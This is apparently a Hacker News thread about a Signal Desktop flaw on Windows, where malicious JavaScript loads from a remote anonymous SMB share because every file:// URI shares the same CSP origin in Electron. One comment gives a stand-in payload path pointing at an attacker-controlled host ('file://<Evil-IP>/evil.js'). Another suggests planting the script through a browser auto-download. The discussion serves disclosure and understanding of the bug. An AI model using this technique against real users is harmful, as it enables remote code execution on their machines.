Hacker News new | ask | show | jobs
by jlund 2954 days ago
Just one additional note that might not be immediately clear from the advisory: Exploiting this requires the attacker to first manually place malware (a malicious JavaScript file) on your computer or on a Samba network share that your computer is already connected to.
5 comments
aortega 2953 days ago
> Exploiting this requires the attacker to first manually place malware (a malicious JavaScript file) on your computer or on a Samba network share that your computer is already connected to.

I'm Alfredo Ortega, part of the team that wrote the original exploit. This is (unfortunately) not true. The exploit on the video was loaded from a Windows share that the victim's computer was not already connected. This is possible using "Anonymous shares" in Windows 10, and older windows versions.

To be clear, you need absolutely no additional software on the victims computers, besides having a vulnerable signal-desktop and be running on windows.

link
bjoli 2954 days ago
Yeah. That fact seems pretty hidden in the reports. Due to proper CSP only local files will be executed.

If you are who I think you are, maybe you could speculate if there is actually any use for this other than loading local files (local file execution) and crashing signal?

link
nitrogen 2954 days ago
If a .js file is redirected to from a web page, with a Content-Disposition header marking it as a download, and (as is common) the browser downloads automatically to ~/Downloads, doesn't that leave the .js file in a predictable place that can then be used by an attack on Electron?
link
bjoli 2954 days ago
that could probably.be answered by jlund. Electron downloading things by default seems like a pretty bad thing to do.
link
aegarbutt 2954 days ago
Or I just expose my malicious share to the Internet. No mounting step necessary.

file://<Evil-IP>/evil.js

link
jlgaddis 2954 days ago
> ... or on a Samba network share that your computer is already connected to.

Does CSP prevent this working with, for example, a malicious.js file on a remote, attacker-controlled Samba server (configured to allow "anonymous" connections)?

link
aegarbutt 2954 days ago
The CSP policy was 'self'. The problem is that all file:// URIs share an origin in Electron.

So, 'self' is ALL file:// URIs.

link
jlund 2952 days ago
I was incorrect about this, and I apologize.
link